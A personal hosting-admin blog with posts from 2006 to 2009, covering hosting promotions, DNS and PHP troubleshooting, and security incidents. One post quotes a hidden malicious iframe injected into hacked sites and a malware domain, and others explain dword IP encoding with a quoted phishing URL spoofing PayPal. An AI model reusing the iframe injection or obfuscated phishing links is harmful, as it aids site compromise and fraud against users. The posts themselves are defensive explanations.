WWW
WWW
November 18, 2009
feel free to surf my new photoshoot gallery at http://matnet.my 
July 24, 2009
As Salam to all,
New Promotion:
5 GB space
60GB Bandwidth
Park/Addon Domain allowed
Unlimited MYSQL, email, ftp , subdomain
CPANEL control panel
Fantastico.
+ FREE domain .com.my net.my org.my
Interested buzz YM matnet80
July 15, 2009
Last 2 weeks i got 2 issue regarding this matters.
The scenario:
All index* was edited and redirect to malicious web using iframe.
Example:
iframe src="http://u9k.ru:8080/index.php" width=151 height=125 style="visibility: hidden">
After investigation:
1. File owner is current users not nobody or others.
2. Files uploaded by the users with right access authentication.
3. All index* was edited in the users www
4. Only current users infected.
How:
The FTP passwd was hacked.
There are 2 reason how the passwd was hacked.
1. Adobe Acrobat Vulnerability
I checked the PDF file with another online service called Wepawet and it identified the malicious code and the exploited vulnerability. Here is the report. This virus makes use of a known vulnerability of Adobe Acrobat (Reader) CVE-2008-2992: “Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument“.
If you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.
This PDF file silently downloads a malicious binary (Windows executable) file from litehitscar .cn, which resides on the same server with hyperliteautoservices .cn (IP 94 .247 .3 .151).
quote from - http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
2. FileZilla Vulnerability.
How to clean up :
1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
4. Now remove the malicious code (the iframes) from your files on server. The easiest way to do it is upload a clean content from a backup.
5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
6. If your site was flagged by Google, request a malware review via Webmaster Tools.
7. Regularly check your site with diagnostics tools of your choice (my Unmask Parasites can be one of them) to be sure your site is clean.
8. Regularly update third party software in your PC.
April 13, 2009
April 6, 2009
Celcom broadband doesn't work well with Streamyx DNS servers even though both are owned by TM.
Not only that my dedi server(IDC owned by TM) also not recognize by celcom broadband dns.
To all my customer that using celcom broadband please use this DNS settings.
208.67.222.222 and 208.67.220.220
Click below for details instruction
1. XP - https://www.opendns.com/start/device/windows-xp
2. Vista - https://www.opendns.com/start/device/windows-vista
3. 2000/NT - https://www.opendns.com/start/device/windows-2000_windows_NT
4. Ubuntu - https://www.opendns.com/start/device/ubuntu
5. Nokia S60 - https://www.opendns.com/start/device/nokia-s60
February 12, 2009
Salam.
Actually promotion nih aku wawarkan dlm kedahonline ja.. tp now aku akan open to public
1000MB Web Space
20GB Bandwidth
Unlimited Subdomain
Unlimited Email Accounts
Support PHP,MYSQL,CGI etc.
CPANEL Control Panel
Wordpress Installed
Server at TM IDC Netmyne Malaysia
Just RM80 setahun
Berminat sila hubungi saya Matnet di ym/email matnet80@yahoo.com
atau terus telefon +60125513251
atau order di :
http://cyberiahosting.net/bill/whmcs/cart.php
February 5, 2009
HSDPA 2 bar = GPRS 4 bar
April 19, 2007
Yes selalu sangat aku dok terima soalan yang tak cukup sifat. Dan kekadang boleh buat aku malas nak layan. Entah tetiba malam nih aku rasa terlebey rajin dan rasa nak marah+merapu pun ada so aku layan jugaklah soalan yang ditanya di FORUM kedahonline.net
Atas sebab2 privacy dan etika, nickname penTANYA telah dirahsiakan.
Saksikan... roll montage...
******* wrote:
Salam kengkawan,
mcm mn nk set kn PHP register_global=off kt web kita supaya PHP server kita Secure.
harap ada yg dpt membantu.
Thank in advance
Matnet menjawab:
Jika kita mempunya akses ke atas server berkenaan spt eclipsecutelady
katakan kita boleh edit PHP configuration dengan meng edit file php.ini nya. Tp saya rasa by default PHP configuration benda nih mmg dah off pun.
Jika server bekenaan bukan server kita dan kita hanya menyewa hosting di server bekenaan dan kita ingin meng customize kan nilai2 config php dengan yg lain contohnya ingin off kan register_globals ini kita boleh meletakkan arahan dibawah di dalam file .htaccess yg berada di public_html
php_flag register_globals off
Sekian, tocey.
******** wrote:
satu lagi problem...aku nk upload dan Install component tp x boleh...
aku upload file.zip pastu click upload & install then kuar mgs problem loading.
aku cuba plak cara install from directory...bila click upload ...error msg out...'Installation file not found'
pls help...thank you in advanced
Matnet menjawab:
ok memandangkan soalan ini secara tiba2 tanpa menceritakan apa yang hendak dibuat dan apa yg sedang dibuat dan tetiba sahaja terkeluar anda ingin memasang sebuah components. oleh yg demikian terpaksalah sy membuat beberapa tekaan jawapan bagi menjawab soalan diatas.
Jawapan edisi tekaan pertama. Jika components tersebut adalah components electronics.
Utk memasang ada beberapa cara anda boleh menggunakan soldering iron, PCB, hetching tools spt acid utk direndam, pen utk melukis litar dan juga beberapa saiz drill utk drill PCB tersebut.
Pertama sekali perlulah melukis dahulu litar pada PCB mengikut citarasa, anda boleh merujuk kpd buku2 spt 1001circuits utk meniru litar yg anda ingini.
Kedua, menyelup PC ke acid dan membuang kuprum2 yg tak diingin pada PC tersebut.
Ketiga, menebuk lubang utk disumbat komponent2 yg ingin kita pasangkan.
Keempat memasukkan components2 yang anda ingin pasang.
Kelima ambik soldering dan solderkan secantik yg mungkin. Kalu bley jgn terlalu nipis atau terlalu tebal ini mungkin akan mengurangkan markah apabila cikgu kemahiran hidup anda menyemak hasil kerja anda.
Keenaam, Walla anda telah berjaya memasang COMPONENTS electronics anda.
------------------------------
Jawapan versi kedua - Jika ia adalah components joomla or mambo
1. Pertama adakah anda pasti permision folder components adalah writeable ?
2. Jika ia sila semak besar manakah file components anda yg dlm bentuk zip tersebut ? selalunya default php configuration file uploads dia set max 2MB sahaja. jika file anda itu besar dari itu makan no way Smile
3. Sila lihat kepunyaan siapakah folder components anda itu ? jika ia bukan kepunyaan anda maka no way jugak utk anda memasang components itu.
4. Sila lihat juga adakah components anda tersebut adalah components yg diiktiraf ? ntah2 components tuh sendirik yg lingkup ? cuba components2 yg lain tgk..
5. Jikalau anda masih mengalami masalah ini saya cadangkan kepada anda supaya mengupload components anda secara manual dan menginstall secara manual. Caranya bagaimana ???? mudah saya sila layan video tutorial ini.
http://www.mambodemo.com/joomla_1.0/install_a_component_manually.html
Sekian dan diharap selepas ini anda dpt memberi soalan2 yang lebih bernas dan mudah untuk dijawab oleh sesiapa sahaja.. apa2pun terima kasih atas maklumat info server yang anda PM kepada saya. Oopss sebelum terlupa jika safe_mode is ON maka mmg pelbagai masalah akan JOOMLA hadapi...terutamanya components2.
wasalam.
December 22, 2006
My server had a problems logging into Horde after update to 10.9.0-R57. Customers would get to the Horde login page (http://example.com:2095/horde/login.php) successfully, but the login would silently fail when they click the Log in button - the page would just reload with no error messages, PHP errors, etc.
I try to fix it with myqlcheck -r horde but not succesful. But i saw something that show horde_sessionhandler was not there. Then i dump this SQL to fix it :
CREATE TABLE horde_sessionhandler (
session_id VARCHAR(32) NOT NULL,
session_lastmodified INT NOT NULL,
session_data LONGBLOB,
PRIMARY KEY (session_id)
) ENGINE = InnoDB;
GRANT SELECT, INSERT, UPDATE, DELETE ON horde_sessionhandler TO horde@localhost;
Problem solved.
December 10, 2006
Ahaha.. i just updated by myspace profiles ?? walla it's so miracle after 4-5 years never update 
lol --> http://myspace.com/matnet
November 14, 2006
I try to lookup "dword" from google and the result is only this :
Definitions of dword on the Web:
Double word. A data element that is 2 words, 4 bytes, or 32 bits in size.
www.ti.com/sc/docs/products/msp/intrface/usb/terms.htm
Before this i had posted regarding phishing technic that used dword to encode the real IP at the URL. So now i'll discuss how 66.117.217.154 translate to 1115019674
From the definition on google dword is 4 bytes or 32 bits, yes of course IPV4 is 32bits so the definition is true. But how the IP translated to usual decimal number ?
OK now lets take a look our first octet :
notes* : 0x is prefix for hex , 0b prefix for binary
Decimal value : 66
Binary value : 0b1000010
Hex value : 0x42
second octet :
Decimal value : 117
Binary value : 0b1110101
Hex value : 0x75
third octet :
Decimal value : 217
Binary value : 0b11011001
Hex value : 0xd9
Fourth octet :
Decimal value : 154
Binary value : 0b10011010
Hex value : 0x9a
Ok now lets take a look at Hex value.
66.117.217.154 will be 0x42.0x75.0xd9.0x9a
so
0x42.0x75.0xd9.0x9a = 0x4275d99a
ok now translate the hex value to decimal, we will get :
0x4275d99a = 1115019674
That's all
p/s :-
- Feel free to access my blog using this dword - http://3393926802
- i'm using this calculator to compute all calculation http://www.microcontroller.com/Embedded.asp?did=92
November 13, 2006
Today, I got a phishing email using a Yahoo redirection. People who claim redirection isn’t a problem read on. Indeed, the URL also uses Dword encoding to further make the URL obfuscated. Here’s the URL:
http://rds.yahoo.com/_ylt=A0LaS
V66fNtDg.kAUoJXNyoA;_ylu=X3oDMTE2ZHVuZ3E3
BGNvbG8DdwRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG=148vsd1jp/EXP=
1138544186/**http%3a//1115019674/www.paypal.com/us/webscr.php?cmd=_login-run
Notice the Dword there? 1115019674 That translates to 66.117.217.154
How someone could ever figure out what that URL was without clicking on it who wasn’t already familiar with phishing schemes, I’ll never know. Phishing is partly social engineering, and my trust in Yahoo is what makes me think, “Sure, I believe that Yahoo could theoretically have some arrangement with other companies to redirect traffic.” The fact that mega companies with known brands have these holes makes this a big problem.
|
